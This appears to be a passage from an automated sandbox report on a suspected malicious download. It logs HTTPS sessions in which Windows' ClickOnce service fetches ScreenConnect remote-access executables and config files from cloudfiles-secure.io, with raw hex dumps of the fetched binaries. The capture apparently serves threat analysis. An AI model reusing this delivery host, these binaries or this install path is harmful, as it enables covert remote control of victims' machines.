                                                                                                                                                                                                                                                                        Data Ascii: zaU9PSDAseDhAQcqR7MV1ezHgDPc/hMXU2NiKyfffAb9zMyYnCeVdFe2WEpXuDTKZpGimrUM10vPbbbZV1+RpDZFioELe9Zjm4zlIQcQ0JUNCuB0KLU+XADARzVEKojUUSBDMBxLsXHCqODJGBTGPPbhRZrGIyycjI4r3jEZAB2tUF1+9XDBJWIhUomL/CLQJ9cwvZPlOfiuzD/PamtOmxcwIKXRymU3WqQXxY08U5VWLUAB1XiamPMRoXZEEeg
                                                                                                                                                                                                                                                                        2024-10-02 04:22:53 UTC16384INData Raw: 69 70 65 69 69 32 61 61 4b 43 67 46 56 6f 6a 2f 6e 61 56 74 6f 55 4e 46 73 67 4d 51 59 42 6c 31 50 32 61 4e 2b 39 6d 33 63 75 74 50 57 47 7a 53 65 7a 46 64 57 6a 76 66 59 50 54 55 2b 50 53 68 63 67 6f 43 79 34 39 64 55 35 6d 58 73 30 59 30 39 59 6b 6a 61 38 43 73 6c 2b 6d 33 46 7a 54 45 53 4c 4f 4a 65 59 48 66 6b 50 6b 63 52 4b 4d 78 31 70 42 37 70 4f 6b 37 35 70 5a 30 61 33 50 75 32 62 46 4a 68 6d 77 62 6b 58 38 65 78 55 4e 4c 76 6a 61 69 75 6b 78 33 35 39 70 31 7a 7a 64 62 49 45 65 4d 4c 2f 73 61 68 7a 38 2f 32 4b 35 55 68 42 42 33 6a 52 66 75 58 36 4d 68 6c 53 5a 53 78 57 49 6b 36 46 71 41 41 73 41 30 6f 31 48 4f 45 50 68 69 43 43 4a 30 78 37 73 56 44 41 2f 45 47 5a 4b 4b 42 54 55 72 75 4b 57 76 79 71 59 73 72 6d 7a 5a 64 2f 2b 62 4e 54 59 41 59 34 79
                                                                                                                                                                                                                                                                        Data Ascii: ipeii2aaKCgFVoj/naVtoUNFsgMQYBl1P2aN+9m3cutPWGzSezFdWjvfYPTU+PShcgoCy49dU5mXs0Y09Ykja8Csl+m3FzTESLOJeYHfkPkcRKMx1pB7pOk75pZ0a3Pu2bFJhmwbkX8exUNLvjaiukx359p1zzdbIEeML/sahz8/2K5UhBB3jRfuX6MhlSZSxWIk6FqAAsA0o1HOEPhiCCJ0x7sVDA/EGZKKBTUruKWvyqYsrmzZd/+bNTYAY4y
                                                                                                                                                                                                                                                                        2024-10-02 04:22:53 UTC16384INData Raw: 74 42 72 4c 4d 79 43 59 49 35 49 58 52 35 67 71 68 68 72 43 71 71 75 4d 67 59 31 4e 52 31 41 69 4f 30 42 32 4f 51 33 38 67 61 34 35 58 61 4d 37 38 6b 79 79 33 41 38 39 6e 78 64 38 73 6a 30 43 35 4a 6b 55 56 76 44 66 43 37 53 6d 45 7a 41 6f 4a 4b 67 4a 6e 4e 34 39 71 58 33 41 32 79 72 41 72 55 59 41 7a 36 68 62 59 4d 65 6c 30 73 38 68 70 47 39 54 4a 38 44 39 51 69 41 58 77 51 51 45 2f 78 51 58 37 36 50 46 63 57 58 43 51 6b 43 70 4a 5a 61 68 4b 46 66 52 6f 6e 57 48 63 70 5a 52 56 58 36 46 48 61 59 72 2f 43 71 41 43 54 44 59 35 46 77 74 61 75 72 69 71 6b 57 61 4d 43 32 74 39 30 53 65 30 52 42 67 56 7a 30 52 6a 6d 58 52 46 50 48 65 69 6c 4c 6c 50 78 2f 43 4a 68 41 75 50 34 62 77 65 63 46 2f 74 4a 64 54 76 73 74 7a 65 77 79 54 30 62 32 46 49 5a 7a 73 6b 59 75
                                                                                                                                                                                                                                                                        Data Ascii: tBrLMyCYI5IXR5gqhhrCqquMgY1NR1AiO0B2OQ38ga45XaM78kyy3A89nxd8sj0C5JkUVvDfC7SmEzAoJKgJnN49qX3A2yrArUYAz6hbYMel0s8hpG9TJ8D9QiAXwQQE/xQX76PFcWXCQkCpJZahKFfRonWHcpZRVX6FHaYr/CqACTDY5FwtauriqkWaMC2t90Se0RBgVz0RjmXRFPHeilLlPx/CJhAuP4bwecF/tJdTvstzewyT0b2FIZzskYu


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        1192.168.2.549709178.215.236.1194431196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-10-02 04:22:54 UTC102OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cloudfiles-secure.io
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                        2024-10-02 04:22:54 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Length: 17866
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Date: Wed, 02 Oct 2024 04:22:54 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-10-02 04:22:54 UTC16168INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
                                                                                                                                                                                                                                                                        2024-10-02 04:22:54 UTC1698INData Raw: 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55
                                                                                                                                                                                                                                                                        Data Ascii: 2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        2192.168.2.549722178.215.236.1194431196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-10-02 04:22:59 UTC128OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cloudfiles-secure.io
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        2024-10-02 04:23:00 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Length: 95520
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Date: Wed, 02 Oct 2024 04:22:59 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-10-02 04:23:00 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                                                                                                                                        2024-10-02 04:23:00 UTC16384INData Raw: 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00
                                                                                                                                                                                                                                                                        Data Ascii: ut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
                                                                                                                                                                                                                                                                        2024-10-02 04:23:00 UTC16384INData Raw: ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b
                                                                                                                                                                                                                                                                        Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF|t^8uYt8uP0(YYt8uPYYv|YYtE8u@-P
                                                                                                                                                                                                                                                                        2024-10-02 04:23:00 UTC16384INData Raw: fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39
                                                                                                                                                                                                                                                                        Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9
                                                                                                                                                                                                                                                                        2024-10-02 04:23:00 UTC16384INData Raw: 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00
                                                                                                                                                                                                                                                                        Data Ascii: de-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
                                                                                                                                                                                                                                                                        2024-10-02 04:23:00 UTC13816INData Raw: 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b
                                                                                                                                                                                                                                                                        Data Ascii: 3033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        3192.168.2.549723178.215.236.1194431196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-10-02 04:23:00 UTC112OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cloudfiles-secure.io
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                        2024-10-02 04:23:01 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Length: 61216
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Date: Wed, 02 Oct 2024 04:23:01 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-10-02 04:23:01 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4c e0 0e b8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 33 5d 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL"0 @ 3]@
                                                                                                                                                                                                                                                                        2024-10-02 04:23:01 UTC16384INData Raw: 16 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19
                                                                                                                                                                                                                                                                        Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
                                                                                                                                                                                                                                                                        2024-10-02 04:23:01 UTC16384INData Raw: 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00
                                                                                                                                                                                                                                                                        Data Ascii: ThresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_Item
                                                                                                                                                                                                                                                                        2024-10-02 04:23:01 UTC12280INData Raw: 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3e 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 00 00 00 00 00 42 00 0d 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31
                                                                                                                                                                                                                                                                        Data Ascii: Connect.WindowsBackstageShell.exe<ProductNameScreenConnect>ProductVersion24.2.10.8991BAssembly Version24.2.10.8991


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        4192.168.2.549724178.215.236.1194431196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-10-02 04:23:01 UTC116OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cloudfiles-secure.io
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                        2024-10-02 04:23:02 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Date: Wed, 02 Oct 2024 04:23:02 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-10-02 04:23:02 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        5192.168.2.549726178.215.236.1194431196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-10-02 04:23:02 UTC111OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cloudfiles-secure.io
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                        2024-10-02 04:23:03 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Date: Wed, 02 Oct 2024 04:23:02 GMT
                                                                                                                                                                                                                                                                        Connection: close
